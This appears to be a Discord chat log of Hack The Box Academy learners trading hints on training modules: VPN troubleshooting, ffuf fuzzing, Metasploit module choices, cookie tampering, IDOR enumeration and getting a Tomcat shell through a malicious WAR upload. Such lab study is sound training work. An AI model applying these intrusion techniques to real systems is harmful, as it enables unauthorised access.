#modules

@mortal nebula You can get some cubes by completing other stuff first, check the HTB faq or forums, or ask a moderator about specifics

I solved the problem just to let you know! ahaha thank you again

@potent badger great!, np

lol...first post 😄 Doing the Linux Fundamentals module and since I've blown my 1 instance spawn for the day, I decided to use my Linux box and the OpenVPN file "academy.ovpn" but it would always bomb out with an error . I had to change "cipher AES-128-CBC" to "data-ciphers-fallback AES-128-CBC" in the ovpn file before it would let me in. Is this known?

I've never run into that issue, although most of the time i haven't needed the vpn to connect to instances

what was the error?

1 sec...I'll paste it...

"Error: negotiated cipher not allowed - AES-128-CBC not in AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305"

This is the academy.ovpn file you download from the site. But without modification, it doesn't appear to work. I mean, I fixed it, I just wondered if this was a known issue

Not used OpenVPN before so that was a little adventure 🙂

not known to me, but could be worth checking if others on the forum had the issue, and if so without help, you could paste your fix with your machine specs, could be helpful

Ya, i love openvpn, its great

Sure, will do 🙂

👍

Er, could you point me towards the forum please? I don't see it listed in the FAQ

sure, https://forum.hackthebox.com/

Much obliged 👍

Anyone here completed the cert ?

not yet, bout 34% done

How is it ?

the bb course? great!

Sweet, i'm in then 😄

Your word is good enough for me complete stranger from the internet haha

Lol. you'll learn a lot, they've updated some stuff since i started, so im doing a refresher through what I've done already.

great!

Guys so i connected to the htb vpn with terminal but i don't know how to disconnect from it ? Should i even disconnect from it ? If yes why and how

Ctrl C

Sudo apt install cowsay -y; Echo “Yayyyy” | cowsay

Do both of those and you should disconnect from the vpn

what if i already closed the terminal ? :< (i actually closed the terminal becouse i thought that if i exit the terminal it will disconnect automaticly )

Sudo pkill -15 openvpn

Then repeat step 2 (important)

bash: Sudo: command not found

Show me terminal

Sudo killall openvpn also works

https://linuxjourney.com/lesson/monitor-processes-ps-command
Here is also a good resource to learn more about processes in linux : )

still dont know how to close the vpn

Do lowercase sudo

I gave you the command

👏don’t👏forget👏case👏sensitivity👏

If you do ip a do you have tun0?

Dm me

You used echo to copy the hash didn't you?

UGH I do not understand what I am missing on this metasploit module. Anyone online that can help?

which section are you stuck on?

sessions and jobs question 2

you can use ||exploit/linux/http/elfinder_archive_cmd_injection|| with a 64 payload

I thought I knew what they were trying to hint at but neither exploit works

Yeah, I tried it but let me try the payload

ok I guess I just needed to choose the right payload. Now I feel dumb lol

feeling dumb is actually just the feeling of getting smarter

You would think as many modules as I have completed that I could pass a tier 0 mod without asking for help

i have completed over 400 room on tryhackme but i'm still dumb

https://academy.hackthebox.com/module/23/section/254
Can anybody check if the skills assessment for this loads for them ? I get no port

skills assessment for File Inclusion module?

work find for me

sorry, specifically the Remote File Inclusion (RFI) page

again still work find for me (i use rustscan to check)

Anyone good with the find command

Need to find the number of files that have .log extension

@mighty pivot try find -type f -name *.log | wc -l

Ok that confirms what I was thinking, thank you

Do you also know a way to list how many installed packages are on the system? What I’ve tried is “apt list —installed | wc -l” but my answer is wrong

I was wondering if there’s duplicates I need to sort or something

hey guys, i'm new to linux, i recently downloaded the lubuntu 20.04 lxqt distro, and a few days ago, the sound stopped working, what should this bug be? I've tried several commands in the terminal and it didn't help

Search on YouTube, I remember there was one video around ubuntu sound not working properly

Or restart your machine and check if sounds are back to normal

I'm stealing this one

hi everyone, i need help on LFI module, basic bypass section

ok bro, i had searched on youtube of my language but almost none solved

sometimes you have to reinstall a couple times to get everything to work together. My most recent install on a hardware machine took 3 goes before everything worked like it should

If that doesn't do it, try a different version of the distro, and if not, a different distro

Hey hey ! I would like a sanity check for Broken Auth skills assessments if possible

can you help me bro?

can anyone who completed the file upload attack module message me please? i have a question

Module: Using MSF, chapter: "Writing and Importing Modules"

I downloaded "nagios3_command_injection.rb" and did reload_all

However, I am not able to use that module

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/metasploit-framework/modules/exploits/unix/webapp | grep nagi
nagios3_command_injection.rb
nagios3_history_cgi.rb
nagios3_statuswml_ping.rb
nagios_graph_explorer.rb

msf6 > use exploit/unix/webapp/nagios3_command_injection.rb
[-] No results from search
[-] Failed to load module: exploit/unix/webapp/nagios3_command_injection

hi bro, can u help me?

sure..what do you need help with?

Hey @west canopy ! I'm doing the Footprinting Lab-Hard.
I did connect through SSH, but can't figure out how to connect to the database. (access denied errors). Can you DM me for a nudge?
Edit: solved this.

hey guys im in the ffuf module and im doing the directory fuzzing section but my scan is taking significantly longer than shown in the module

in the module, it shows the scan compelted in 9 seconds while mine is taking much longer, what may I be doign wrong? i tried to up the threads to 50 as well

if you found, dir you want, just quit it

i need help on LFI module bro

i send u dm

hi

how to hack

help me

bra

that wasnt my question...

so what?

you gave a completely unrelated answer to my question lol

my question!!

what your question?

how to hack something..

😬

for me know

what problem?

Could I get a sanity check on the Broken Authentication module, Bruteforcing Cookies section? I am able to tamper with the cookie to change roles, but I keep getting the same message (no flag). I'd appreciate bouncing ideas off someone.

Sorry thinking of another question

No worries.

Which question are you on

It's question 1. I wrote a script that works (for tampering the cookie) but I'm wondering if I'm using the wrong name. May I message you to avoid spoilers here?

Yes

I think I'm being thick or not giving the answer in the correct format for the question - I am doing the User Management part of the Linux Fundamentals module and I know my answer is correct but it's not having it

"Which option needs to be set to create a home directory for a new user using "useradd" command?"

I've tried "useradd -d", "-d", "--home-dir HOME_DIR", "useradd --home-dir HOME_DIR"

It doesn't like it 😛

Ah, no - I misunderstood the question 😄

Figured out my issue. At least the script worked. 😂

Web attacks skill assessment, I found the IDOR and can change different users passwords to log in as them,, but none of the users seem to be admin. Not sure what to do here

https://linux.die.net/man/8/useradd

It was actually "-m/--create-home" I misunderstood the wording of the question 😛

you can fuzz the ids in burp and find the admin

what do you think of the ice dragon browser?

I did twice the first time I only looked at usernames, second time around I scrolled real slow and happened to catch the correct username, the rest was somewhat of a breeze.

never heard of it

ask

Which module shall I do next
Recently completed hacking wordpress

I welcome suggestions

Privilege escalation modules

Stuck on linux privilege escalation one
Would revisit it soon

@polar widget which section are you stuck on?

@polar widget that depends on what you have done already

Skills assessment 2nd last question

The one which involves something around exploiting apache tomcat , as far as I remember

if you look in /etc/tomcat9 there are credentials hidden in a config file

I'll definitely look into it

No wait wait a second
That credential hunt already happened

Like we did hunt and SSHed of SUed

Switched to another user

Aaa, I had worked on that one some 15 days ago :/

i recommend footprinting

Aight 🎉

can someone tell me why my metasploit says db not connected.?

@lethal atlas I'm not sure, something similar happens on my 2019 kali image. But if i launch Metasploit from the shortcut on the toolbar , it seems ok.

metasploit uses PostgreSQL no? Checked the DB service is running?

yes and it is

nm think I found the issue

Weird - I get similar behaviour

Well, similar but worse behaviour 😄

I have this moduel finished. I will trying helping you out when I am availible

This works from the cli: - "sudo msfdb init && msfconsole"

I can init the db but get this error

I'm pure guessing here, but "sudo msfdb init" is obviously starting some service prior to the msfconsole - without it, the DB won't connect, so that's how the GUI version is starting some database service prior to trying to connect to it with msfconsole.

Presumably some on-the-fly postgres instance or something

it only runs on windows

nix > Windows lol

true, kek

but for those who are new to linux, it gives a headache

that can be true but after using it for awhile I prefer it. Only downside is gaming but that is changing all the time

Windows for desktop, Linux for servers. Although I did Linux exclusively for, like, 10 years and it was fine - switched to Windows for VR development (Linux VR support is still shakey)

Aha, "sudo msfdb init" ..."creates and initialises the msf database" - so reckon I was right. Must create it on the fly

still doesnt let me connect to the db.

Does "sudo msfdb init" state that it's running?

yes

And just doing "msfconsole" gives you the not connected error from here?

no msfconsole works fine. its only when trying to use something like db_nmap that the errors appear

Yeah, cos the db instance isn't connected for some reason, won't show until you try a query. Whelp, that's all I got 🙂 Works for me, I just tried to replicate it with db_nmap query also

well it does NOT work for me

Indeed. But it will work from the UI?

not the db_nmap

nothing related to a database works. but I can use msfconsole normally

Looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand

anyone else doing the bloodhound module? ive gotten all of the last questions sorted except for the last where legit no matter what i do, i get a "no data returned from query"

wondering if anyone else ran into the issue - ive rebooted the pwnbox, verified that query should be working, but still no luck

jk, i got it sorted - if anyone has questions about it, feel free to DM

ive heard a bunch of people have issues with the bloodhound module

i got it sorted - it really wasnt that bad, save for the fact you have to use the pwnbox if your version of bloodhound isnt the same

aha

oh well - onto powerview and im done with the AD module

just in time for PNPT!

woo!

👀

yoooo that MitreAtt&ck tho 👀

first hour on htb, is the only way to get more cubes for tier 1 modules by buying them?

@blissful verge

Hi all, I just need some help with Web Attack IDOR part where mass IDOR Enumeration secion

I think the fundamental modules refund your cubes, but it's never a net gain so you will eventually need to buy cubes

could someone please me?

thanks

@coral heath what are you having trouble with? I think I just fuzzed uid's in burpsuite until i found the flag

fuzzed uid to 20 but not showing any documents..

so not sure if the parameter is correct

It's a number less than 20

Yes did. Just wondering if I can PM you...?

Could someone point me in the right direction on the broken authentication skill assessment? ive figured out how the cookies are encoded and enumerated a couple of accounts and can access them through changing the cookies, but i dont know where to go from here
and of course i got it immediately after

sure

Guyssss

Hey

Need you asap. I’m in module of privilaged groups. Just entered the root user but cannot find the flag. It says that I need to check the users special privileges but I cannot perform sudo -l inside ssh…

?

Sorry, which module/section do you need help with?

Hello. I need help with the "Using Metasploit Framework" module. The questions is "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I've run the exploit but no session is created so how can I go about finding the flag? Please DM me if you can help. Thank you!

I'm hoping someone can help me out with the Broken Authentication Skills Assessment.
I think I'm in the final stages but can't elevate a user to reach the admin panel. Please DM if you can help out, thank you.

Privilaged groups - Linux privilaged escalation

sec i will DM you

@knotty falcon were you able to get logged in as the support user? Try manipulating the cookie

Yes I did. I assumed the next step was t||o alter the the support user's rememberme cookie or the sessionID ||to elevate their privs, but it never worked out. Am I on the right path or should I try something else?

@umbral yacht did you remember to set the LHOST?

how to Learn hack can someone explain me where to start in this server

enumerate more users , if you have the support role your privs its on a superior role , don't think support user have it

Could someone please help me with Web Attacks skill assessment part? I've managed to get the admin user but the only function I can see is change the password but Access denied.

I also have the token right... but still Access denied

Start here at the Academy with the Easy modules.
Good paths to get started:

https://academy.hackthebox.com/path/preview/operating-system-fundamentals

https://academy.hackthebox.com/path/preview/cracking-into-hack-the-box

You can DM me

@acoustic owl thanks brother but what are applictio we used for hacking in window

@acoustic owl accept req for future doubts thansk

@surreal rain from where to take roles

It depends on what exactly you want to do.

If you want to start, you first need a good knowledge of networking and operating systems like Linux and Windows.
Only then focus on tools

In the intro to networks when it says /24 means that the first 3 octets are the same, does that mean the first digit of the first 3 numbers in an address? Like if it was 150.150.150.150 for example, the octets they reference are the “1” at the start of each number?

i Have brother very nice knowledge

This is what I’m referencing by the way “The /24 network allows computers to talk to each other as long as the first three octets of an IP Address are the same (ex: 192.168.1.xxx). “

octets reference the address in binary format
your case 150.150.150.150
150 -> 10010110 , the address
10010110.10010110.10010110.10010110
but you write on decimal cause its simple

So from the example they gave 192.168.1.xxx, is the octet the “1”?

Because that’s the only same number I see

Then your brother can enroll here in the Academy and work through all the modules

the first octet its 192 , second 168, third is 1
if you pass to binary 11000000. 10101000 . 00000001 . xxxxxxxx

Ok I see, but then why do they say as long as the addresses are the same, since they’re different?

no, an IPv4 address consists of four octets.
In the example:
192.168.111.222
1st octet: 192
2nd octet: 168
3rd octet: 111
4th octet: 222

the first 3 octets are the same , but you have 4 octets in all IPv4 addr, so what change are that 4 octet
from 192.168.1.1 to 192.168.1.255 , were address that belong to 192.168.1.0/24

Sorry I’m slow to understand this for some reason, I don’t see how 192, 168, and 111 are the same :/

there i am new can tell every step day by day

@@acoustic owl

@acoustic owl can you put my nickname Thory007

#welcome

I am not an admin, I can not change anything here

No, I didn't because their wasn't an option to set the LHOST. I will try it though

@languid dawn hey can you change

please don't ping everyone...

you can follow the instructions on #welcome to get your HTB account name

In the exercise "Attacking Web Applications with Ffuf", there is a question to scan subdomains to find subordinate Vhosts to 'academy.htb'. I've run the ffuf command, got a (small) number of vhosts (let's call them 'alpha', 'bravo', 'charlie' to avoid spoilers, and there may be more or less than 3). My problem is that I don't quite know what sort of answer is expected. If I enter 'alpha.academy.htb bravo.academy.htb charlie.academy.htb', I get "wrong answer". I don't want anyone to tell me the solution: but can someone indicate if my format of answer is right?

otherwise you can also just change your name to something with only ascii chars and rejoin the server 🙂

we don't accept non-ascii names here

yaya pentest module finished

k

nvm - I understand that it didn't want to list any vhost subdomains which had been previously disclosed in the instructions - only ones which had not been mentioned.

Why am I not able to connect to a target machine on academy? Im using my own computer but I have a running openvpn connection using the file I downloaded(the vpn key)
smbclient connection to failed (error nt_status_host_unreachable)

Hey guys, is there somewhere a walkthrough for SQLmap essentials ? I worked through 12 modules but I am completely stuck on this one. I dont understand what they want from me. I completed all other modules for the Basic Toolset.

Did you get this figured out, I’m working on this one right now and could use a sanity check.

make sure your exploit and target vuln with that exploit

Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to use secretdumps

Good morning/afternoon. In the Getting Started Module, I am struggling with the privilege escalation. I can get connected to the target as user1 and I can switch to user2, but for the life of me, I can't figure out how to escalate my privilege to root. I keep seeing alot about using a privesc exploit and enumerating the target, but everything seems to need to be run from the target system and I can't figure out how to get things there to run them, due to lack of root access.

Start a web server on your system and on the target host you can download the file.
Exactly as explained in the module, section 18 Nibbles - Privilege Escalation.

hello

Awesome, I'll take a look. Thanks!

I'm not sure I understand, if that is necessary, why that section comes well after the Privilege Escalation section

Hmm? It is described in the Privilege Escalation section.

You looking at that under Getting Started -> Privilege Escalation? Because it doesn't say that anywhere on mine.

I just see there is a Privilege Escalation page and a Nibbles - Privilege Escalation page.

This is what I see, but Privilege Escalation is well above the Nibbles. This is why I'm a bit confused.

Yes exactly, my mistake.
I thought you were at Nibbles.

Anyone available for a nudge on the Broken Authentication skills challenge?

You can DM me

Someone made the File Inclusion -> Automated Scanning? Somehow it doesn't work

@marble tinsel first we have to fuzz the parameter name , then we fuzz for the value. If you need help feel free to DM me 🙂

@torpid imp feel free to DM if you still need help with SQMap 🙂

Question: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

||when you go on the targeted website it shows Simple Backup Plugin 2.7.10 for WordPress so i used scanner/http/wp_simple_backup_file_read on metasploit and it gave me [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed||

How can i access the information i just got after running this exploit?

Which module and which section?

Still looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand

https://academy.hackthebox.com/module/77/section/843

@limpid wharf it should save the output to a file

i dont understand why mine wont save. tried setting a new file path still the same result

hi I have a question in the "File Upload Attack" course, I am at the "Blacklist Filters" section, I could'nt find the answer to the qestion, when i upload a file it display the source code and won't execute it...

Can I ask someone ?

Hey guys! I finished the module Web Requests. It was all good except for the optional exercise at the last section CRUD API. Adding a new city via curl -X POST was good. But how to do the following I couldn't get - Exercise: ~Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section~. I'd appreciate your help. My head won's stop pounding until I get this.

Done, I find the solution

@hollow notch I got stuck on that for a second too, couldn't leave it alone and spent an afternoon fiddling with it

@hollow notch So you're creating a Fetch POST request, since there's no POST method on this challenge, go back one and copy/pasta that Fetch POST, then modify it for the new one

@hollow notch try deleting HTB_City and New_HTB_City, then rename a city to "Flag" and curl it

Hey! Thanks for your answer. I wanted to clarify a bit. Where should I create the request? If I do staff in the browser via http://IP/api.php/city, I get only the GET request. As I believe, I should modify this one somehow to make it a POST request. However, I don't understand where I should add the lines with the new city. Or should I do it some other way?

@hollow notch i'll pop back real quick and see what i did

@hollow notch shoot me a DM so we don't have to clog chat

Could someone please help me with the Running SQLMap on an HTTP Request second flag in SQLMAP Eseentials?

Could I have a nudge on the web proxies skill assessment?I'm pretty sure I am using the correct payload processing settings in Burp intruder

@raven cairn DM me

Hey! Could someone help me understand how to answer the questions using vHosts app.inlanefreight.local and dev.inlanefreight.local in the "Information Gathering - Active Infrastructure Identification" module?

@lyric echo you want to add them to your /etc/hosts file, and then you can curl them

ahhh ok. I will do that. Thanks!

np 🙂

did anyone finish Web Service & API Attacks - Skills Assessment? I know about the ExecuteCommand Spoofing, but the challange said that it must be achived through SQLi, and if i try to spoof Login SOAP action, the server hang

Soap is the way

but i can't interact with SOAP action 'Login', the server hang on, im trying from python requests

okey, I think I already understood

If you're using the correct payload processing settings then the flag should be at the bottom of the response in the results of the Intruder attack. Also, since your only fuzzing one character, and your encoding it twice to get a cookie similar to the original result. The position in Burp that your fuzzing ought to resemble what you need to fuzz, as the cookie value is added and processed as a prefix, there shouldn't be duplication in the position.

While doing HTB module "Footprinting" im stucked in SMB, the last question says What is the full system path of that specific share. I'm unable to find the path any hints?

@summer prism try connecting with rpcclient and then netshareenumall

just had to write here and suddenly got a solution in my mind, worked

thanks

np !

could anyone dm me about the Web Service & API Attacks skill assessment? im so very lost

I need a little help enumerating SMTP users, the only way i know off is using metasploit but the module hasn't discussed that method yet

@summer prism is this footprinting?

yes

I've found the username using metasploit, just curious if there's another way out

I had to use metasploit as well, smtp-user-enum was the other tool i tried and it didn't work

Hey!
So I'm connected to the academy VPN and I'm trying to scan a target from my kali. The Target IP is from Getting Started academy module and it's not working.
Am I missing anything?

If it's a docker target you probably can't ping or nmap it

or if you nmap it will only have the one port open

actually the target I got is 206.189.25.173:32212
so yep, it has a port given, and nmap doesn't accept a port as far as I know
but I have to scan it
what is it I can do please?

so this is a docker target

try just navigating to it in your browser

ohhhhh
thanks a lotttt!!!!!
i'm really new to all this.
Thanks again 😉

you're welcome 🙂

hey guys for attacking web applications with ffuf, in the GET section, how can I know the port and IP of admin.academy.htb?

i know academy.htb IP and port is the one given in the instance on the bottom section

but after finding the admin.* subdomain, not sure what its IP is so i can't save it to /etc/hosts

All vHosts use the same IP address as your target computer

so if i go to admin.academy.htb it should work right?

in my case, i have the IP of academy.htb saved in my /etc/hosts file and it works when i navigate there with the port, but when i go to admin.academy.htb:PORT it gives me an error on the webpage

Did you add admin.academy.htb to the hosts file?

no i dont know what the IP is

The same IP from the target computer

so they have same IP?

what about port?

Both are identical.
Be sure to check out the principle of vHosts

ok thanks

On penetration testing process module, post-engagement section, what does PCI DSS stands for. Why is this answer wrong?

Write out DSS only.
PCI remains abbreviated

Thanks!!

hi in Pivoting, Tunneling, and Port Forwarding module i have a problem with chisel i uploaded it tried to run it and with sudo but it give this error "./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)" i have try the --reverse but i have the same error

I modified the question in this section as I realized it appears twice in the module in similar ways. we're only human!

Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to ssh into the host

Anyone available for a nudge on the Broken Authentication skills challenge pls?

hey i am currently doing the File Upload Module (Blacklist Filters)

Whats wrong? Some .php files get uploaded but its not a real web-shell :/ (using the SecLists web-extension.txt as a wordlist)

for this question, is this asking to get all the href links? I don't understand what the question is asking for:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

Hello guys,
I am doing Linux Local Privilege Escalation Assessment. Even I gain root, but I cannot find flag1.txt

So how to find out flag1.txt

if you have root, it should be in the root home folder /root/

also if you know it's named flag1, you can use find, or possibly locate

0.o okay yeah that's a tad weird, maybe it's a hidden file or something, not sure on that one

Maybe try "*flag*.txt"?

Nice, it works ^^

Nice 😄 So it's because it is a hidden file

yaya

ls -a (the option a will show the hidden files).

find typically will as well but the caveat is that the leading '.' has to be captured by the regex

Is there someone completed the File Upload Module ? :/

done. Thanks for reminding me

can someone help me with password bruteforcing. I'm on the first skills assessment part.

did a brute force, it gave me a username and password, but now doesn't work

gives me a different name everytime xD

can you show me what you're returning? that doesn't sound right lol

you can dm me so there's no spoilers if you want

will do now yeah

added you

did hackthebox have some major update recently?

i remember visiting the site 2yrs ago and most things used to be paid, writeups werent available for free machines and to join you had to do a little puzzle

all that is gone now?

salted usernames!!!???

2 years pretty longtime so yes changes have been made

i THINK it has something to do with the boolean string i'm using to verify a successful logon

ah so the things i said, those are completely gone now?

is anyone around to give me a hint on the web service and api attacks skill assessment? i feel like im missing something obvious

There is free and non free machines. The VIP machines haft to be paid but you'll have full access to free machines.. Im relatively new to hack the box so I have no reference for the good ol days, Though id think there's a lot more features now and there's also hack the box academy. Which has step by step courses in different cyber security subjects.

I see

Thanks for the update 👍

hack the box academy is a completely different site from hack the box. But they're complementary. Hack the box will sometimes suggest academy modules that will give you knowledge to pwn a particular box and after completing academy modules it will recommend some boxes that utilize some the skills in the course you just took.

Yeah i just saw the 3 sites a few mins ago

it seems promising

yeah i thought it was my boolean fail/success string but i don't think it's that now. i'm stuck

for sure

Still stuck here, would love if someone could point me in the right direction

You can DM me

Congrats! I'm jealous!

Thank you! Here's to hoping to exam goes well 😬

can anyone help me with this?

Module : Using Metasploit Framework
Sub : Sessions

Hello guys,
I stuck at flag4, Linux Local Escalate Privilege assessment
Any more hint?

I found another user who should have access to the admin panel but I'm not able to ||decode/re-code the support user's cookie ||to give me access as this new admin user. Is this what you're trying to do as well? Because I'm stuck as this stage.

I finished up this morning. Feel free to DM if you need help.

figured thnx

I know the external service is tomcat, but dont still get how to get password of user tomcat

tomcat version 9, I cannot find any good exploit for this

I also try default creds but cannot

ah i got it

anyone available to help me out with the brute forcing passwords skills assessment? i'm getting different usernames/passwords everytime and none of them work xD

it's always one of the first names/passwords on the list

i've got my theories and i want to hash it out with someone and avoid spoilers in this chat

could someone please help me with sqlmap essential module..?

What is the customized version of the POP3 server?, Footprinting module. I was able to get the version but HTB won't accept it

@rich mulch tomcat credentials are hidden in a log file, once we get logged in to tomcat we can upload a malicious WAR file to get another shell and ultimately reach the final flag

@summer prism try running: nmap -A --script=banner <ip address>

if anyone have done information gathering module please dm me

trying to fuzz vhost but my fuff just outputs the whole wordlist
ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://inlanefreight.htb -H "Host: FUZZ.inlanefreight.htb" -fs 612

@hexed tartan did you add 'http://inlanefreight.htb/ to your /etc/hosts? If the url can't resolve it won't know where to fuzz

<ip> inlanefreight.htb so not http:// i think it should be enough

I need a little help regarding reading emails using curl, i'm stucked in trying to read emails using curl

@summer prism found this https://everything.curl.dev/usingcurl/reademail, if you're trying to read emails in exchange, or gmail, or something you'll probably have to do some research on it, or check the relevant APIs for each to see if its possible

nvm, resolved

Good evening! Trying to wrap up the hashcat module in Academy, and having challenges with the Academy module, as the module was written for deprecated utils/hashcat plugins, and the new cap2hccapx will not create hashes in the necessary format, anyone familiar with how to get the hccapx format out of the cap file? 😮

there's a hashcat mod? nice!

Yep - it's not part of the free Academy stuff though... think it's Tier II

It's been really useful up to this point.. but I've been trying to get the conversion right for over an hour and a half

there is an online tool from hashcat that will do the conversion right.. .but, I want to learn how to do it offline, and the module just basically says "The tools we use are deprecated, you should use new tools"

pay to win baby! Don't know if it helps, but have you tried using John to make the hash? apparently its easier, had to make one from a zip earlier today.

If I knew how to use the tools.. I wouldn't be taking the module 😮

Well, there is hashcat tool online: https://hashcat.net/cap2hashcat/index.pl

that is working.... but i've downloaded and compiled hcxpcapngtool .. and it spits out garbage (or errors out on the same file).

I have a newer version than the one on that page too.. it would make sense if the webpage had a newer version.. but doesn't seem like most tools regress capabilities when they get updated 😛

lol. Ya sry im no help, but could be worth msging the dev team, seeing if they know a solution that fits your needs, plus you could chat them up about how their software works, etc.

maybe even write up your own tooooll?? *wink wink

The hashcat dev team... or the module developer.. would think HTB would like to make their modules up to date with working / latest tools?

if I had the skills to write my own tools.. I wouldn't be taking HTB Academy modules.. 😐

Ya they try, it's alot to keep updated, especially in the sec field

totally understand.. been in the field for a while (30 years :o) - hence why I'd like to provide feedback.. was kinda thinking this might be the dc channel to do that.. maybe not though.

really appreciate the chat though.. I thought maybe I'd get crickets in the chan anyway

lol just feeling spicy this evening or something?

so contentious. or maybe it's just my reading lol

nope, might just be your reading.. don't think i'm being spicy... or maybe I am 🤷‍♂️

not intentional, if so 😮

I could just use the file that the website handed me.. but I'd really like to understand how to use the tools on my own....

nope, didn't get that impression

@lethal atlas Have you figured out how to solve the Trick?

@left saddle so is the challenge using hashcat to break wpa/2 keys?

yep

they give you a pcap file.. which has a whole bunch of integrity issues it seems

but works when passing it through the online site, but not when passing it through the same util I converted.

probably likely I'm doing something wrong

but 🤷‍♂️

I'm trying to remember the last time i cracked a pcap, I was playing with capturing wifi packets, that whole thing, and it did the work locally, oh ya, aircrack

if the pcap is corrupted i guess it wouldnt help

yeah.. apparently there is a new hashcat mode .. so it's not 2500 anymore it's 22000

but it does a fine enough job of cracking, it might be slower than hashcat

yeah.. I've thought of using alternate tools.. it's really about learning hashcat though 😮 lol

Well, right tool right job i guess, it'll crack it locally, so thats a plus, but ya if hashcat is being a pain then that's that 😛

yeah.. I'm sure it's just me doing something wrong, hoping to learn the right way to do it though, vs. just grabbing the file that got spit out of the website.. this is probably why these modules take me so long.. I want to learn the stuff, not just get the flags.. heh

again, appreciate the chat though... i'll just keep digging at it

kk, gl with it.

figured it out! the help is pretty crappy on the file

what's the fix?

part of it was that I was having issues with my terminal emulator on my mac :P. It was only printing half of the help file.. so I was not seeing any options that made any sense.

Ahaa, well glad you figured it out

had to use the -o option to output in the file format for hashcat 22000

which seems almost obvious.. but there was no -o option in my help output 😐

so, this is what cracking passwords is like IRL anyway, you spend hours working on something, only to find you missed a single char in your format or rule. 😛

LoL

took 1 sec to crack

lol. yup, probably pretty close to reality.

took ~1.5 hours to figure out what command line to use

😆

and now.. as a reward, I get +1 cube!!!

What i love about that though, is that it made such an impression that next time around it'll be way easier

nod that's whY I wanted to know how to extract the hashes myself.. heh

hi

We can use burp suite too, works like a charm
Zap is zap ⚡

I purposely did the Burp mod twice, once in burp and once in ZAP so I had a working familiarity with both. I do like that ZAP is an open community tool

plus the Hud is cool, makes me feel like im in a cockpit or mechsuit or something

Anyone able to give me a nudge on Password Attacks: Credential Hunting in Linux?

Edit: SOLVED!

@west canopy no idea here, haven't done it yet. Guessin' its more compilcated than linPEAS and gtfobin?

@west canopy or is it some kind of bruteforcing thing?

yea, bruteforcing + enumerating the file system to look for credentials

do you have a user shell? if so what're the sudo permissions? any suid root stuff?

anyone available to help out with the academy module login brute forcing: skills assessment: website? i'm on the second question

@quiet prism DM me 🙂

hey guys im in last section of the attacking web apps with ffuf module

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

Hi guys,Could someone give me some hint about COMMAND INJECTIONS-Skills Assessment?
I can't bypass ;

anyone avaible to help me with the file upload > type filters?

I sloved it

||Don't use ; lol||

👍

hi, i've a problem with https://academy.hackthebox.com/module/35/section/227
i've updated all cities name to flag as requested then i've deleted all cities but when a search for a city named flag just []output from vm
i've done a script with 2 for , one for update the name to flag and the second one for delete all cities
both operations worked fine, names was updated to flag
and all cities was deleted

I feel like an idiot in the Windows Fundamentals portion. I feel like I have no idea what is going on and I am completely lost in the Skills Assessment. Does anyone have any recommendations on a lighter approach for understanding Windows? I am comfortable with Linux and Mac, I don't have much experience with Windows. I need help. 😫

Hey anyone finished the Vulnerability Assessment module? I have completed all the questions in the Nessus Skills Assessment but stumped at the first question: "What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)" any hint or guidance will be welcomed

Can anyone give a nudge with Bypassing other blacklisted characters?

I am not getting an error just blank responses

nevermind found it

Module : Using Metasploit Framework
Sub : Sessions
I've been stuck on this since yesterday please if someone could guide me a bit

====
Hi I cannot connect to htb-ovpn. How to slow this issue?

@rich mulch open vpn 2.6?

yes

change cipher AES-128-CBC

to data-ciphers AES-128-CBC

change in which file?

if you've issue with ipv6 route

pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"

in your config of academy-regular

is it working ?

should I change both line 12 and 13?

try to comments both lines

add only data-ciphers AES-128-CBC

done

it shows up errors as above image

add filter for ipv6 as i wrote

pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"

ah ok

still the same errors

wait

i'll post my conf

ah I got it, because I choose file ovpn protocol tcp (443)

but in the config file use proto udp

that why I failed

btw thanks for your help. Without this, I still cannot connect

you're welcome

done thnx

getting started

Web Enumeration section

idk what to do

nothing works

and anything I try to do is full of errors

I cannot acces the target http://x.x.x.x/

dm me the ss of the question @pallid breach

ok

somene could help me?

First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

i've done all requirement but when i've ask search flag city empty array

and no flag

Hey all

So on the Password Attacks Password Reuse / Default Passwords
It asks me to find some credentials for mysql
I cant find it. Any hints?

Anyone able to give a nudge on Command injections skill assment? got the request for the payload but keep getting malicious request denied {nvm, found it}

Hi,You should try all function of this web, then find out which one can injection

then translate the requested action to Linux command

PASSWORD ATTACKS

